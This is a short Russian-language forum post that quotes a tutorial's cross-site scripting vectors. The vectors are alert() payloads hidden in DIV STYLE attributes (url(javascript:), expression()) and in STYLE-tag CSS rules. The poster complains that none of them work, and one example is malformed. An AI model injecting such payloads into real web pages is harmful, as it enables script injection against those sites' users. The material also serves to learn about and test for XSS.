Как я и думал,точнейшие примеры из етого сайта по етому,вот

2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:
<DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">

Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():
<DIV STYLE="width: expression(alert('Я здесь был '));">
В данном случае тоже используется параметр STYLE.

3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:
<STYLE>.XSS{background-image:url("javascript:alert('Я здесь был ')");}</STYLE><A CLASS=XSS></A>

Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью
<A CLASS=XSS></A>

Второй вариант:
<STYLE> type="text/css">BODY{background:url("javascript:alert(‘Я здесь был’)")} </STYLE>
В этом варианте наш XSS-код указывается как фоновое изображение странички.



И НЕОДИН ИЗ НИХ НЕ ПАШЕТ!(((